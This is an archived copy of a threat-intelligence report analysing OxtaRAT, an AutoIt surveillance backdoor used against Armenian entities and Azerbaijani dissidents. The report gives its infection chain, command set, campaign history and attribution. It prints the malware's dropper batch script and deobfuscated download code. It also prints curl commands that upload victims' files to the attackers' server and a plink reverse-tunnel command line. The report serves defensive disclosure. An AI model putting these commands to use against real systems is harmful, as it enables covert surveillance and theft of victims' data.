{
	"id": "a00a5c29-b5c5-4c5f-96a8-34a2100b60f0",
	"created_at": "2026-04-06T00:13:47.572332Z",
	"updated_at": "2026-04-10T13:11:52.916586Z",
	"deleted_at": null,
	"sha1_hash": "b193f073c01e5420165d7f91a89e2de32ae2e2a8",
	"title": "Operation Silent Watch: Desktop Surveillance in Azerbaijan and Armenia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 153100,
	"plain_text": "Operation Silent Watch: Desktop Surveillance in Azerbaijan and\r\nArmenia\r\nBy etal\r\nPublished: 2023-02-16 · Archived: 2026-04-05 21:12:28 UTC\r\nExecutive summary\r\nAmid rising tensions between Azerbaijan and Armenia over the Lachin corridor in late 2022, Check Point Research\r\nidentified a malicious campaign against entities in Armenia. The malware distributed in this campaign is a new version of a\r\nbackdoor we track as OxtaRAT, an AutoIt-based tool for remote access and desktop surveillance.\r\nKey findings:\r\nThe newest version of OxtaRAT is a polyglot file, which combines compiled AutoIT script and an image. The tool\r\ncapabilities include searching for and exfiltrating files from the infected machine, recording the video from the web\r\ncamera and desktop, remotely controlling the compromised machine with TightVNC, installing a web shell,\r\nperforming port scanning, and more.\r\nCompared to previous campaigns of this threat actor, the latest campaign from November 2022 presents changes in\r\nthe infection chain, improved operational security, and new functionality to improve the ways to steal the victim’s\r\ndata.\r\nThe threat actors behind these attacks have been targeting human rights organizations, dissidents, and independent\r\nmedia in Azerbaijan for several years. This is the first time there is a clear indication of these attackers using\r\nOxtaRAT against Armenian targets and targeting corporate environments.\r\nIn this report, we provide a full technical analysis of the OxtaRAT as well as its capabilities and evolution over the years. We\r\nalso discuss the tactics, techniques and procedures (TTPs) of the threat actors, complete with an overview of their activity\r\nthroughout the years.\r\nBackground\r\nThe Republic of Artsakh, also known as the Nagorno-Karabakh Republic, is a breakaway region in the South Caucasus with\r\na majority ethnic Armenian population but is recognized internationally as part of Azerbaijan. 
It is a de facto enclave within\r\nAzerbaijan, with the only land route to Armenia through the Lachin corridor, which has been under the control of Russian\r\npeacekeepers since the end of the Second Nagorno-Karabakh War in 2020.\r\nThe situation in Artsakh is tense, with frequent ceasefire violations and sporadic outbreaks of violence. For more than two\r\ndecades, this unresolved highly militarized ethno-nationalist territorial conflict continues to be a source of tension between\r\nArmenia and Azerbaijan.\r\nFigure 1 – Map of the conflict over Nagorno-Karabakh (Artsakh). Source: CNN.\r\nThe Infection Chain\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 1 of 12\n\nFigure 2 – The infection chain.\r\nA malicious file named Israeli_NGO_thanks_Artsakh_bank_for_the_support_of.scr was submitted to VirusTotal (VT) on\r\nNovember 29, 2022, from an IP address located in Yerevan, Armenia.\r\nIt is a self-extracting archive that masquerades as a PDF file and bears a PDF icon. Upon execution, it drops to the Temp\r\nfolder of the infected device and executes a self-extracting cab called Alexander_Lapshin.EXE . This in turn drops multiple\r\nadditional files and executes one of them – the exec.bat script. 
In its deobfuscated form, this script is very short:\r\n@echo off\r\nxcopy /y /e /k /h /i * %appdata%\\Autoit3\\\r\ncopy /b /y %appdata%\\Autoit3\\Alexander_Lapshin.pdf %temp%\\\r\nstart %temp%\\Alexander_Lapshin.pdf\r\nstart %appdata%\\Autoit3\\Autoit3.exe %appdata%\\Autoit3\\icon.png\r\nexit\r\nThe exec.bat file is responsible for opening a lure PDF file that contains a Wikipedia article about Alexander Lapshin. At\r\nthe same time, in the background, it copies multiple auxiliary files and the AutoIt interpreter to %appdata%\\Autoit3\\ and\r\nuses it to execute malicious AutoIt code hidden inside an image called icon.png .\r\nFigure 3 – Lure PDF document.\r\nAlexander Lapshin, a Russian-Israeli travel blogger, journalist, and human rights activist, was detained in Belarus in 2016\r\nand extradited to Azerbaijan. He was sentenced to 3 years in prison for illegally crossing the internationally recognized\r\nborders of Azerbaijan, without authorization from the Azerbaijani authorities, in 2011 and 2012 while visiting Nagorno-Karabakh from Armenia. Nine months into his detention, in September 2017, Lapshin was attacked in a solitary confinement\r\ncell of a Baku pre-trial detention center. 
The attack was publicly declared by Azerbaijani officials to be a suicide attempt.\r\nAfterward, he was pardoned by the Azerbaijani President and deported to Israel.\r\nIn 2021, the European Court of Human Rights in the “CASE OF LAPSHIN v. AZERBAIJAN” ruled that Lapshin’s right to\r\nlife had been violated by the Azerbaijani authorities and mandated that Azerbaijan pay 30,000 Euros as compensation. After the\r\nverdict, Lapshin publicly posted a picture of the credit card he opened to receive his compensation, issued by the Armenian\r\nArtsakhbank. Likely, this incident made Lapshin’s name an attractive lure for the attackers targeting the bank.\r\nThe OxtaRAT Backdoor\r\nAs we mentioned previously, AutoIT.exe is used to run code from an image called icon.png . This is a polyglot malware,\r\ncombining valid JPEG and AutoIT A3X file formats:\r\nFigure 4 – Icon.png image and its internal structure.\r\nAutoIT is a legitimate tool that is used by many IT administrators to automate tasks but is frequently abused by threat actors.\r\nIn this case, the actors use a fully functional backdoor containing approximately 20,000 lines of obfuscated AutoIt code:\r\nFigure 5 – Fragment of OxtaRAT code including string obfuscations and random names.\r\nThe backdoor, which we call OxtaRAT, contains a variety of capabilities typically associated with espionage activity. 
It\r\ncontains commands that allow the attackers to:\r\nRun additional code on the infected machine, install a PHP web shell, download, upload and execute files.\r\nSearch and exfiltrate files from specific locations or with specific patterns, and even install the PHP FileManager for\r\neasier access to and management of the files.\r\nPerform active surveillance activity: record video from a web camera or desktop, and install additional software, such\r\nas TightVNC, to remotely control and monitor the machine.\r\nPerform recon on the local machine, such as getting information about the processes, drives, system information, and\r\nthe speed of the internet connection using Speedtest.\r\nUse a compromised host as a pivot to move through the network: perform port scanning and use Putty’s plink for\r\ntunneled communication.\r\nExecution flow\r\nThe backdoor starts by first setting up its base folder, moving the icon.png file there, and adding a persistence mechanism\r\nto run it every 2 minutes with AutoIt3.exe via a scheduled task named WallPaperChangeApp . It also creates a working\r\nfolder to store the results and logs of each command execution and sets the hidden and system attributes on both the base and\r\nworking folders so that they are not easily discovered and do not arouse suspicion. 
It also downloads the legitimate curl\r\nexecutable and DLL, which are later used for some types of C\u0026C communication.\r\nThe C\u0026C server for this sample is edupoliceam[.]info , a lookalike for the domain of the Police Education Complex of\r\nPolice of the Republic of Armenia.\r\nNext, the malware enters the main infinite loop, where in each step it performs the following actions:\r\nCreates a screenshot of the infected computer.\r\nSends a GET request to the C\u0026C server to report the victim’s basic information:\r\nhttps://edupoliceam[.]info/upload.php?GUID=\u003cguid\u003e\u0026SYS=PC_Name|User_Name|IP_address .\r\nUploads (using curl) to the C\u0026C server all the files from the working folder, which contain screenshots and the results\r\nand logs of the previous command execution.\r\nSends a GET request to the C\u0026C server to retrieve the next command from the URL:\r\nhttps://edupoliceam[.]info/upload.php?GUID=\u003cguid\u003e\u0026come=1 .\r\nMost of the capabilities require additional files, mostly legitimate, to be downloaded during the malware execution from the\r\npath on the server /requirement/up/bin/ :\r\n/requirement/up/bin/postup.exe (curl.exe)\r\n/requirement/up/bin/libcurl.dll\r\n/requirement/up/bin/vlc.zip\r\n/requirement/up/bin/7zxa.dll\r\n/requirement/up/bin/7za.exe\r\n/requirement/up/bin/7za.dll\r\n/requirement/up/bin/pscclient.exe (port scanner)\r\n/requirement/up/bin/ptun.exe (Plink)\r\n/requirement/up/bin/wintight.exe (TightVNC)\r\n/requirement/up/bin/wsrrun.exe (PHP CLI and PHP File Manager, https://sourceforge.net/projects/phpfm/)\r\n/requirement/up/bin/WinRAR32.zip\r\n/requirement/up/bin/WinRAR64.zip\r\n/requirement/up/bin/speedtest.zip (based on https://github.com/sivel/speedtest-cli)\r\n/requirement/up/bin/AppCrashCollector.exe (the “implant”)\r\nThe only next-stage tool that wasn’t available on the server was AppCrashCollector.exe , whose download and execution\r\nare triggered by the implant command. 
We assume that this is the payload that the actors attempt to hide from researchers\r\nand deliver to important targets only after additional checks are performed on the infected machine.\r\nC\u0026C communication and commands\r\nThe communication between the malware and its C\u0026C server is based on clear text commands; the arguments for each\r\ncommand are separated by the “|” sign.\r\nThe full list of commands supported by the backdoor, one per line as command (parameters): description.\r\ndownload (file name): Upload a file using curl (postup.exe): postup.exe -s -o nul -k --max-time 777 -A \"Mozilla/5.0 (Windows NT 11.0; rv:54.0) Gecko/20100101 Firefox/96.1\" -F \"file=@\"filename\" https://edupoliceam[.]info/upload.php?GUID=\u003cguid\u003e .\r\nupload (file name): Download a file and save it with a specified filename and random prefix in the Temp directory.\r\nuploadexec (file name): Download and execute with wmic /node:%computername%\" process call create $output_filename .\r\naueval (expression to be evaluated): Execute a specified expression with the AutoIT command Execute.\r\nmakepersistent: Create a scheduled task called WallPaperChangeApp .\r\nimplant: Download and execute AppCrashCollector.exe .\r\nstopimplant: Kill the AppCrashCollector process with taskkill /IM and set settings.ini to 0.\r\nsearch (path, pattern): Search for a pattern in a specified path with PowerShell -Noni -command '(get-childitem '\" \u0026 $path \u0026 \"' -Recurse -ea 0)| select Fullname | ? {$_.Fullname -like '\" \u0026 $pattern \u0026 \"'} | fl .\r\nlistdesktop: List the contents of the Desktop folder with dir /s \"%homepath%\\Desktop .\r\nlistdir (directory path): List a specified directory recursively, including the last modified date and size.\r\nmassdownload (path, filter): Upload files from a specified path with a specified filter (include/exclude), using curl for each file (the same way as the download command), with the \u0026MASSDL=1 parameter in the URL.\r\nmassdownload2list (path, filter): List all files in a specified path matching the specified filter to the Thumb.db file.\r\nmassdownload2 (path, filter, [range]): Upload files from a specified path from Thumb.db with a POST request to the URL with the \u0026MASSDL2=1 parameter.\r\nwebcamrecord (length): Webcam recording using VLC: $tmp_blcvid \u0026 \"\\blc\\vlc\\MediaRun.exe --no-qt-privacy-ask dshow:// --sout file/avi:\" \u0026 $tmp_blcvid \u0026 \"\\webcam-video-record-\" \u0026 $timestamp \u0026 \"-sec-\" \u0026 $chunk_length \u0026 \".avi --run-time=\" \u0026 $chunk_length \u0026 \" -Idummy --quiet vlc://quit\" . The records are uploaded zipped using curl and are then deleted.\r\ndesktoprecord (length): Desktop recording using VLC: $tmp_blcvid \u0026 \"\\blc\\vlc\\MediaRun.exe --no-qt-privacy-ask screen:// --sout file/avi:\" \u0026 $tmp_blcvid \u0026 \"\\Desktop-video-record-\" \u0026 $timestamp \u0026 \"-sec-\" \u0026 $chunk_length \u0026 \".avi --run-time=\" \u0026 $chunk_length \u0026 \" -Idummy --quiet vlc://quit\" . The records are uploaded zipped using curl and then deleted.\r\ntightvnc: Download Wintight.exe (an AutoIt compiled executable which extracts and runs tvnserver.exe) and execute it with wmic process call create .\r\nkilltightvnc: Kill TightVNC with taskkill /IM TVN* /F .\r\nzipit (source, zip file name, destination, [filter]): Zip the folder using 7za.exe .\r\nunzipit (source, destination): Unzip the archive using 7za.exe .\r\ninstallrar: Download and unzip WinRAR.\r\nrarit (source, destination, [extensions], [volume_size]): Archive the file/files with specific extensions from the folder using WinRAR.\r\nunrarit (source, destination): Extract the archive using Unrar.exe.\r\nreboot: Reboot with cmd.exe /c shutdown -r -t 0 /f .\r\ncurl (url): Execute the curl command: postup.exe -i -vvv -k --max-time 60 -A \"Mozilla/5.0 (Windows NT 11.0; rv:54.0) Gecko/20100101 Firefox/96.0.1\" \u0026 $url .\r\nportscan (ip/ip_range, port/port_range): Download and execute the portscan script (AutoIT-based pscclient.exe ).\r\ntunnel (server, user, password, port, host, host_port, local_port): Download, unzip and execute reverse port forwarding with plink: ptun.exe \u0026 $server \u0026 \" -P \" \u0026 $port \u0026 \" -C -R 127.0.0.1:\" \u0026 $listen_port \u0026 \":\" \u0026 $host \u0026 \":\" \u0026 $host_port \u0026 \" -l \" \u0026 $user \u0026 \" -pw \" \u0026 $password .\r\nkilltunnel: Kill the tunnel with taskkill /IM powers* /F \u0026 taskkill /IM ptun.exe .\r\nwwwserv: Download, unzip and run a PHP web server on port 3136 with PHP File Manager. This is done by downloading the AutoIT-based wsrrun.exe which extracts all needed files and executes the php CLI as connectionlessupdate.exe -q -S 127.0.0.1:3136 -t \u003croot folder\u003e -H .\r\nstopwwwserv: Kill the web server with taskkill /IM connectionle* /F .\r\nwmicexec (process): Execute with 'wmic /node:' \u0026 %computername% \u0026 'process call create' \u0026 $process .\r\nsysinfo: Collect system info with hostname \u0026 ipconfig /all \u0026 arp -a \u0026 getmac \u0026 net use \u0026 net share \u0026 quser /server:localhost \u0026 whoami /all \u0026 net user \u0026 systeminfo \u0026 wmic process get commandline \u0026 nslookup myip.opendns.com. resolver1.opendns.com .\r\ngetip: Get the IP address with nslookup myip.opendns.com resolver1.opendns.com.\r\nshowdrives: Get network drives with powershell -ep bypass -command get-psdrive .\r\nproclist: Get the process list by wmic process get commandline .\r\nspeedtest: Download, unzip and execute Speedtest.\r\nshowagentversion: Return the agent version (version 11 is hardcoded in this specific sample).\r\ntempclean: Clean the Temp folder with rmdir /q /s %temp%, mkdir %temp% .\r\nradar (time): Exit if the time since the last call is smaller than the parameter.\r\nexitself: Exit.\r\nFor the commands that require output, the final command line that was executed and its output are written to the working\r\ndirectory, to a file named Random(1, 815782) \u0026 \"-command-.txt\" .\r\nPrevious campaigns\r\nAlthough not widely discussed, previous versions of the OxtaRAT backdoor were used in earlier attacks against Azerbaijani\r\npolitical and human rights activists – or, when the targets were not disclosed publicly, their lures referenced Azerbaijan-Armenia tensions around Artsakh. 
The older versions of OxtaRAT have significantly less functionality than the new variant\r\nbut contain similar code and names for most of the commands and the same C\u0026C communication pattern.\r\nJune 2021\r\nIn July 2021, Qurium Media reported that several prominent human rights and political activists in Azerbaijan received\r\ntargeted phishing emails that lured them into downloading malware from a Google Drive link. The link led to a password-protected RAR archive (the password was specified in the email) which in turn contained an Auto-IT compiled executable\r\ncalled “Human Rights Invoice Form Document -2021.exe” . When executed, it downloaded from the C\u0026C server\r\nshoesbuysellone[.]live the main AutoIT malware (md5: 0360185bc6371ae42ca0dffe0a21455d). Although it doesn’t\r\ncontain a hardcoded “agent version” number, we can clearly see that this is an earlier version of OxtaRAT. It has very\r\nsimilar functionality and code, but supports fewer commands (11 in total):\r\ndownload\r\nimplant\r\nstopimplant\r\nmassdownload\r\nwebcamrecord\r\ndesktoprecord\r\nmakepersistent\r\naueval\r\nupload\r\nuploadexec\r\nwmicexec\r\nAugust 2021\r\nIn August 2021, another sample was observed, this time submitted to VirusTotal from Armenia. The file, called\r\nREPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION (Final Updated 2021).scr , also bears the PDF icon, and when\r\nexecuted, presents the victim with the following PDF lure:\r\nFigure 6 – PDF lure for the August 2021 version (md5: ddac9a1189e4b9528d411e07d0e98895).\r\nIn the background, it downloads the main malware from the C\u0026C server https://www.filecloudservices.xyz/wp-comment.php and saves it as PhoneAppService.Exe . 
The code of this version implements the same string obfuscation as the\r\nnewest version:\r\n$koda_gui =\r\nStringFromASCIIArray(StringSplit(\"77|111|122|105|108|108|97|47|53|46|48|32|40|76|105|110|117|120|59|32|85|59|32|65|110|100|114|111|105|100|32|52|46\r\n\"|\"), 1) // Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like\r\nGecko) Version/4.0 Mobile Safari/534.30 18.3\r\nFileInstall(\".\\REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n@AppDataDir \u0026 \"\\\" \u0026 \"REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n1)\r\n$n =\r\nStringFromASCIIArray(StringSplit(\"104|116|116|112|115|58|47|47|119|119|119|46|102|105|108|101|99|108|111|117|100|115|101|114|118|105|99|101|115|46\r\n\"|\"), 1) //https://www.filecloudservices.xyz/wp-comment.php\r\n$m = StringFromASCIIArray(StringSplit(\"80|104|111|110|101|65|112|112|83|101|114|118|105|99|101|46|69|120|101\", \"|\"), 1)\r\n//PhoneAppService.Exe\r\nRun(@ComSpec \u0026 \" File.txt /\" \u0026 \"c \" \u0026 StringFromASCIIArray(StringSplit(\"115|116|97|114|116\", \"|\"), 1) \u0026 \" \" \u0026\r\n@AppDataDir \u0026 \"\\\" \u0026 \"REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n@AppDataDir, @SW_HIDE)\r\nHttpSetUserAgent($koda_gui)\r\nHttpSetProxy(1)\r\nInetGet($n, @TempDir \u0026 \"\\\" \u0026 $m, 1)\r\nFebruary 2022\r\nIn February 2022, Qurium reported another attack, this time targeting Abulfaz Gurbanli, an Azerbaijani political\r\nactivist. 
The attackers pretended to be BBC journalists and, similar to the June 2021 attacks, sent the victim an email which\r\ncontained a Google Drive link, pointing to a password-protected RAR archive called BBC-suallar.rar (“BBC questions”).\r\nOnce again, an AutoIT-compiled executable called suallar.scr was extracted. This time, it masqueraded as a Word\r\ndocument, complete with a Word icon. Upon execution, it presented the lure DOC file called smm-fraza.doc .\r\nIn the background, it downloaded from the C\u0026C server https://smartappsfoursix[.]xyz/wp-feed.php and ran another\r\nversion of OxtaRAT. This is a more advanced version, compared to the 2021 attacks, with many additional commands added\r\n(29 in total):\r\ndownload\r\naueval\r\nupload\r\nuploadexec\r\nexittemp\r\nimplant\r\ncurl\r\nreboot\r\nzipit\r\nunzipit\r\ntunnel\r\ntightvnc\r\nstopimplant\r\nradar\r\nmassdownload\r\nwebcamrecord\r\ndesktoprecord\r\nmakepersistent\r\nuntrace\r\nwwwserv\r\nstopwwwserv\r\nwmicexec\r\nsearch\r\nsysinfo\r\nshowdrives\r\ngetip\r\nlistdesktop\r\nkilltightvnc\r\nkilltunnel\r\nThe version from June 2021 was capable only of downloading and exfiltrating files, executing binaries and AutoIT code,\r\nand recording data from the desktop and web camera. In contrast, the version observed in February 2022 is a more powerful\r\nmalware with a lot of additional features. 
The actors added capabilities to improve local file enumeration (list files on the\r\ndesktop, search for specific files), collect data about the compromised system, work with zip files, and, most importantly,\r\nimproved the ways they can access and control the infected machine by adding commands to install TightVNC or the PHP\r\nweb server.\r\nHow does the attack from November 2022 differ from the earlier attacks?\r\nInfection chain\r\nThe first change that the actors implemented in their latest attack is in the infection chain. Previously, the initial .SCR files,\r\nmasquerading as Word or PDF documents, served only as downloaders. They sent a request to WordPress-like URLs on the\r\nC\u0026C server ( wp-feed.php , wp-comment.php , etc) and then executed the main malware received from the attackers’ server.\r\nIn the latest campaign, the .SCR file already contains the OxtaRAT backdoor, as a polyglot file. This saves the actors from\r\nneeding to make additional requests for binaries to the C\u0026C server and attracting unnecessary attention, as well as hides the\r\nmain malware from being easily discovered on the infected machine, as it looks like a regular image and bypasses type-specific protections.  \r\nGeofencing\r\nThe actors added an additional measure to protect their infrastructure, geofencing the C\u0026C domains that store the auxiliary\r\ntools and additional payloads. This is a technique currently used by many experienced threat actors to make sure that the\r\nproper execution flow is not triggered by sandboxes or researchers, but only on the targeted machines. In this case, the actors\r\nlimited their operations to Armenian IP addresses.\r\nData collection and exfiltration\r\nSince the previous publicly disclosed version, OxtaRAT was updated with 10 additional commands introducing new\r\nfunctionality. Most of the new features aim to improve the ways to steal the victim’s data. 
For example, they implemented\r\nthe listdir command to recursively enumerate the files in a specified folder, collecting additional data such as the last\r\nmodified date and size. The previously existing command massdownload , which is used to exfiltrate files of predefined\r\ntypes, was also updated with a few new file extensions (marked in bold):\r\n\"*.mdb;*.accdb;*.rdo;*.ora;*.accda;*.accdr;*.accdt;*.ppt;*.avi;*.pptx;*.odt;*.pdf;*.txt;*.msf;*.docx;*.xml;*.doc;*.rtf;*.jpg;*.jpeg;*.pn\r\nAs can be seen from this snippet, the actors are now interested in additional file types related to Oracle and Microsoft Access\r\ndatabases. This is an interesting development, as it indicates they may be broadening their targets to include corporate\r\nnetworks or specific individuals, as common private computers rarely contain personal files in DB formats.\r\nThe actors also implemented “advanced” mass-download commands such as the massdownload2 and massdownload2list\r\nthat allow the actors to enumerate and exfiltrate specified filetypes more conveniently. In addition, they implemented\r\nfunctions to work with RAR archives ( installrar , rarit , unrarit ) which, along with the clear benefits of uploading\r\nthe auxiliary tools inside RAR archives to the infected machines, enable the actors to archive all the files of their interest to\r\nthe multi-volume RAR archive. 
The default list of extensions provided in the code of the rarit exfiltration function shows\r\na focus on documents, pictures, archives, and databases:\r\nFunc rar_it($source_file_or_dir, $destination_path, $extensions_to_rar =\r\n\"*.xls;*.xlsx;*.doc;*.docx;*.pdf;*.rar;*.zip;*.tar;*.tar.gz;*.sql;*.txt;*.mdb;*.jpg;*.jpeg;*.accdb\", $parts = \"12M\")\r\nAnother interesting feature included in the most recent version is the speedtest command, which invokes Speedtest CLI, a\r\ndedicated tool to test the speed and performance of an internet connection. As the malware is not only capable of collecting a\r\nlarge quantity of files but also of recording video from a web camera and screen, it can produce significantly large outputs with\r\ngigabytes of data. Therefore, for the sake of OPSEC, to hide the extensive data exfiltration the actors likely needed a way to\r\ncontrol and estimate the upload of all the collected information to their servers.\r\nThe last feature added to the data collection mechanism is the proclist command, which uses WMIC to retrieve the\r\ncommand line for each of the processes. 
This feature might be used for evasion purposes, so the actors can make sure they\r\nare running in an actual environment as opposed to a sandbox, as well as to learn more about the software configurations\r\nrunning on the victim’s machine.\r\nPort Scanning\r\nOne of the unexpected features that we found during this investigation is the portscan tool, which is included only in the\r\nnewer version of the backdoor. The port scanner, pscclient.exe , is an Auto-IT based non-obfuscated TCP Connect tool\r\nthat can scan a specified range of IP addresses and a range of ports. The default range of ports configured in the tool includes\r\nboth well-known and non-standard ports:\r\nGlobal $port_range[100] = [135, 4444, 136, 137, 138, 139, 20, 21, 22, 23, 80, 443, 445, 8443, 8080, 3131, 3128, 5681,\r\n5060, 5061, 3389, 33899, 33399, 3390, 389, 4000, 1433, 1521, 9222, 45687, 7292, 789, 50022, 2109, 2233, 55522, 33391,\r\n33392, 33390, 33394, 33389, 33398]\r\nOxtaRAT, which previously had mostly local recon and surveillance capabilities, can now be used as a pivot for active\r\nreconnaissance of other devices. This may indicate that the threat actors are preparing to extend their main attack vector,\r\nwhich is currently social engineering, to infrastructure-based attacks. 
It also might be a sign that the actors are moving from\r\ntargeting individuals to targeting more complex or corporate environments.\r\nInfrastructure\r\nOur search for domains with similar characteristics to edupoliceam[.]info led to more active domains:\r\nfilesindrive[.]info , mediacloud[.]space and avvpassport[.]info . All the domains are registered with NameCheap.\r\nWhile filesindrive[.]info and mediacloud[.]space , similar to filecloudservices[.]xyz used back in 2021, have\r\na generic reference to cloud file storage, the domain avvpassport[.]info is more specific, and it masquerades as the\r\nPassport and Visa Office of the Republic of Armenia. Both of these domains, edupoliceam[.]info and\r\navvpassport[.]info , were created on September 23, 2022, and were likely also used for other attacks on Armenian\r\ntargets.\r\nAt the beginning of our investigation, all of these domains used Cloudflare services to hide their IP addresses. Due to their\r\nconfiguration, by looking for IP addresses with the same behavior, we identified 38.242.197[.]156 as likely their real IP\r\naddress. While we were completing the investigation and notifying the relevant parties, Cloudflare blocked these domains as\r\nmalicious, and they all started to publicly resolve to their real IP address 38.242.197[.]156 .\r\nTargeting and Attribution\r\nAlexander Lapshin, whose name is used in the lure, shared that on the same day the samples were uploaded to VT, the\r\nrepresentatives of Artsakh bank notified him that they had received malicious emails in his name. This information was also later\r\nconfirmed by Cyberhub-AM, a digital security helpdesk for Armenian civil society. 
Due to the infrastructure revealed, we\r\nbelieve that there might have been other targets of this campaign in Armenia as well.\r\nFigure 7 – Facebook post by Lapshin (automatic translation).\r\nAll of the samples from this campaign and earlier ones are related to Azerbaijani government interests; they either targeted\r\nAzerbaijani political and human rights activists or, if the targets were not disclosed publicly, reference tensions between\r\nAzerbaijan and Armenia over Artsakh/Nagorno-Karabakh. Meta, in their Adversarial Threat Report Q1-2021, attributed the\r\nprevious campaigns reported by Qurium to the Azeri Ministry of Internal Affairs. However, no technical analyses were\r\nprovided.\r\nIn 2017, Amnesty International reported a campaign that started as early as November 2015 and continued through 2017.\r\nThis campaign used AutoIt malware called AutoItSpy against Azerbaijani dissidents, and was later connected by Qurium to\r\nother “denial-of-service attacks, intrusion attempts, spear-phishing campaigns and electronic media monitoring from Internet\r\ninfrastructure associated with the Government of Azerbaijan.” The AutoItSpy malware used at the time had the ability to\r\nlog keystrokes and collect screenshots, exfiltrating both over the SMTP protocol.\r\nEven though we couldn’t find any infrastructure overlap with our campaign (considering the gap of a few years and the public\r\nexposure of the previous attacks), there is a significant overlap in major TTPs:\r\nThe use of AutoIT malware.\r\nThe use of files with SCR extensions bearing document-related icons (PDF, Word).\r\nA focus on surveillance technology (keylogging, screen capture, data exfiltration).\r\nSimilar consistent targeting.\r\nAlthough it is tricky to compare the code of tools with different functionality (a keylogger compared to a full-blown\r\nsurveillance tool), 
there are a few high-level overlaps in the coding style of these tools:\r\nThe samples from the AutoItSpy campaign are obfuscated with similar techniques as the OxtaRAT samples from\r\n2022.\r\nTemporary file names with collected information of AutoItSpy and OxtaRAT both mimic the Windows thumbnail\r\ncache:\r\nFigure 8 – “Thumb” in file names of AutoItSpy (top) and OxtaRAT (bottom).\r\nAdditional details match as well, such as the extensive use of %random% %random% %random% in all the batch scripts, the immediate\r\nsetting of file attributes with FileSetAttrib($dir, \"+SH\") on all newly created folders, the excessive use of the\r\nRandom function, etc.\r\nBased on these similarities in TTPs, code and targeting, we can conclude with medium confidence that both cases involve\r\nthe same threat actors. We can also speculate that the missing “implant” in OxtaRAT that we were unable to access might be\r\na keylogger: not only is it an important function missing from OxtaRAT’s multi-functional surveillance arsenal, but the\r\nactors might also take extra measures to avoid revealing it to anyone except the targets, possibly to avoid attribution based on\r\nalready uncovered information.\r\nConclusion\r\nIn this article, we describe the latest attack and the evolution of the tools in the campaigns against Armenian targets, as well\r\nas Azerbaijani activists and dissidents. All the details indicate that the underlying threat actors have been maintaining the\r\ndevelopment of Auto-IT based malware for the last seven years, and are using it in surveillance campaigns whose targets are\r\nconsistent with Azerbaijani interests.\r\nCheck Point’s Threat Prevention Engines provide comprehensive coverage of attack tactics, file types, and operating\r\nsystems and protect against attacks such as those described in this research. 
ThreatCloud is Check Point’s rich cyber defense\r\ndatabase. Its threat intelligence powers Check Point’s zero-day protection solutions.\r\nCheck Point products provide the following coverage against this threat:\r\nAnti-Bot: Trojan.WIN32.OxtaRAT.A, Trojan.WIN32.OxtaRAT.B\r\nThreat Emulation: Trojan.WIN.OxtaRAT.A\r\nIOCs\r\nSource: https://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/"
	],
	"report_names": [
		"operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia"
	],
	"threat_actors": [],
	"ts_created_at": 1775434427,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b193f073c01e5420165d7f91a89e2de32ae2e2a8.pdf",
		"text": "https://archive.orkl.eu/b193f073c01e5420165d7f91a89e2de32ae2e2a8.txt",
		"img": "https://archive.orkl.eu/b193f073c01e5420165d7f91a89e2de32ae2e2a8.jpg"
	}
}